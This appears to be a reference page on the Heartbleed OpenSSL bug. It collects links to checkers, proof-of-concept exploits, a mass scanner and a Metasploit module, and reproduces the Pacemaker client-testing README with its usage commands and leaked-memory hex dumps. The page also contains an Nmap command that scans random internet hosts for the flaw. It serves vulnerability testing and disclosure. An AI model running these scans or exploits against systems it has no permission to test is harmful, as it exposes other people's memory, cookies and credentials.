CVE-2014-0160
Links
https://github.com/DisK0nn3cT/MaltegoHeartbleed
https://github.com/a0726h77/heartbleed-test
https://github.com/musalbas/heartbleed-masstest
https://github.com/decal/ssltest-stls
https://github.com/isgroup-srl/openmagic
https://github.com/offensive-python/HeartLeak
Nmap
nmap -sV -PS443 --open --script=ssl-heartbleed -iR 0
Cisco & DD-WRT
http://security.stackexchange.com/questions/55085/heartbleed-and-routers-asas-other
PoC
A checker (site and tool) for CVE-2014-0160: https://github.com/FiloSottile/Heartbleed ssltest.py: Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford http://pastebin.com/WmxzjkXJ
SSL Server Test https://www.ssllabs.com/ssltest/index.html
Metasploit Module: https://github.com/rapid7/metasploit-framework/pull/3206/files
Nmap NSE script: Detects whether a server is vulnerable to the OpenSSL Heartbleed: https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
Nmap NSE script: Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas https://gist.github.com/RealRancor/10140249
Heartbleeder: Tests your servers for OpenSSL: https://github.com/titanous/heartbleeder?files=1
Heartbleed Attack POC and Mass Scanner: https://bitbucket.org/fb1h2s/cve-2014-0160
Heartbleed Honeypot Script: http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt
Pacamaker
https://github.com/Lekensteyn/pacemaker
Pacemaker
Pacemaker
Attempts to abuse OpenSSL clients that are vulnerable to Heartbleed (CVE-2014-0160). Compatible with Python 2 and 3.
Am I vulnerable?
Run the server:
python pacemaker.py
In your client, open https://localhost:4433/ (replace the hostname if needed). For example:
curl https://localhost:4433/
The client will always fail to connect:
curl: (35) Unknown SSL protocol error in connection to localhost:4433
If you are not vulnerable, the server outputs something like:
Connection from: 127.0.0.1:40736
Possibly not vulnerable
If you are vulnerable, you will see something like:
Connection from: 127.0.0.1:40738
Client returned 65535 (0xffff) bytes
0000: 18 03 03 40 00 02 ff ff 2d 03 03 52 34 c6 6d 86 [email protected].
0010: 8d e8 40 97 da ee 7e 21 c4 1d 2e 9f e9 60 5f 05 ..@...~!.....`_.
0020: b0 ce af 7e b7 95 8c 33 42 3f d5 00 c0 30 00 00 ...~...3B?...0..
0030: 05 00 0f 00 01 01 00 00 00 00 00 00 00 00 00 00 ................
0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
*
4000: 00 00 00 00 00 18 03 03 40 00 00 00 00 00 00 00 ........@.......
8000: 00 00 00 00 00 00 00 00 00 00 18 03 03 40 00 00 .............@..
...
e440: 1d 2e 9f e9 60 5f 05 b0 ce af 7e b7 95 8c 33 42 ....`_....~...3B
e450: 3f d5 00 c0 30 00 00 05 00 0f 00 01 01 00 00 00 ?...0...........
fff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...............
Subsequent lines full of NUL bytes are folded into one with an * thereafter
(like the xxd tool).
An example where more "interesting" memory gets leaked using
wget -O /dev/null https://google.com https://localhost:4433:
Connection from: 127.0.0.1:41914
Client returned 65535 (0xffff) bytes
0000: 18 03 03 40 00 02 ff ff 2d 03 03 52 34 c6 6d 86 [email protected].
0010: 8d e8 40 97 da ee 7e 21 c4 1d 2e 9f e9 60 5f 05 ..@...~!.....`_.
0020: b0 ce af 7e b7 95 8c 33 42 3f d5 00 c0 30 00 00 ...~...3B?...0..
0030: 05 00 0f 00 01 01 65 0d 0a 43 6f 6e 74 65 6e 74 ......e..Content
0040: 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c -Type: text/html
0050: 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d ; charset=UTF-8.
...
0b50: 01 05 05 07 02 01 16 2d 68 74 74 70 73 3a 2f 2f .......-https://
0b60: 77 77 77 2e 67 65 6f 74 72 75 73 74 2e 63 6f 6d www.geotrust.com
0b70: 2f 72 65 73 6f 75 72 63 65 73 2f 72 65 70 6f 73 /resources/repos
0b80: 69 74 6f 72 79 30 0d 06 09 2a 86 48 86 f7 0d 01 itory0...*.H....
0b90: 01 05 05 00 03 81 81 00 76 e1 12 6e 4e 4b 16 12 ........v..nNK..
0ba0: 86 30 06 b2 81 08 cf f0 08 c7 c7 71 7e 66 ee c2 .0.........q~f..
0bb0: ed d4 3b 1f ff f0 f0 c8 4e d6 43 38 b0 b9 30 7d ..;.....N.C8..0}
0bc0: 18 d0 55 83 a2 6a cb 36 11 9c e8 48 66 a3 6d 7f ..U..j.6...Hf.m.
0bd0: b8 13 d4 47 fe 8b 5a 5c 73 fc ae d9 1b 32 19 38 ...G..Z\s....2.8
0be0: ab 97 34 14 aa 96 d2 eb a3 1c 14 08 49 b6 bb e5 ..4.........I...
0bf0: 91 ef 83 36 eb 1d 56 6f ca da bc 73 63 90 e4 7f ...6..Vo...sc...
0c00: 7b 3e 22 cb 3d 07 ed 5f 38 74 9c e3 03 50 4e a1 {>".=.._8t...PN.
0c10: af 98 ee 61 f2 84 3f 12 00 00 00 00 00 00 00 00 ...a..?.........
0c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
*
4000: 00 00 00 00 00 18 03 03 40 00 00 00 00 00 00 00 ........@.......
...
ffd0: 00 00 00 00 5c d3 3c 02 00 00 00 00 49 53 4f 36 ....\.<.....ISO6
ffe0: 34 36 2d 53 45 2f 2f 00 53 45 4e 5f 38 35 30 32 46-SE//.SEN_8502
fff0: 30 30 5f 42 2f 2f 00 00 00 00 00 00 00 00 00 00_B//.........
Advanced usage
Run ./pacemaker.py -h for more options. The most important options are
probably -t (--timeout) and -x (--count). The default timeout is 3
seconds which should be enough for most clients to respond (unless there is a
satellite link or something).
Example to be more patient per heartbeat (5 seconds) and acquire four heartbeat responses:
./pacemaker.py -t 5 -x 4
In theory, the heartbeats can take twenty seconds now, but in practice you will get responses much faster.
Tested clients
The following clients have been tested against OpenSSL 1.0.1f on Arch Linux and leaked memory before the handshake:
- MariaDB 5.5.36
- wget 1.15 (leaks memory of earlier connections and own state)
- curl 7.36.0 (https, FTP/IMAP/POP3/SMTP with --ftp-ssl)
- git 1.9.1 (tested clone / push, leaks not much)
- nginx 1.4.7 (in proxy mode, leaks memory of previous requests)
- links 2.8 (leaks contents of previous visits!)
- KDE 4.12.4 (kioclient, Dolphin, tested https and ftps with kde4-ftps-kio)
- Exim 4.82 (outgoing SMTP)
links is a great example that demonstrates the effect of this bug on clients. It is a text-based browser that leaks details including headers (cookies, authorization tokens) and page contents.
ssltest.py
This repository also contains a working version that targets servers. ssltest.py was created by Jared Stafford ([email protected]), all due credits are to him! It was retrieved from http://s3.jspenguin.org/ssltest.py.
At the moment, the script is only compatible with Python 2.
Links
https://www.nccgroup.com/en/blog/2014/04/heartbleed-openssl-vulnerability/ https://www.mattslifebytes.com/?p=533 https://gist.github.com/takeshixx/10107280 https://github.com/FiloSottile/Heartbleed http://www.reddit.com/r/netsec/comments/22huui/python_heartbleed_cve20140160_proof_of_concept/
http://lab.onsec.ru/2014/04/memory-dumper-based-on-cve-2014-0160.html
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent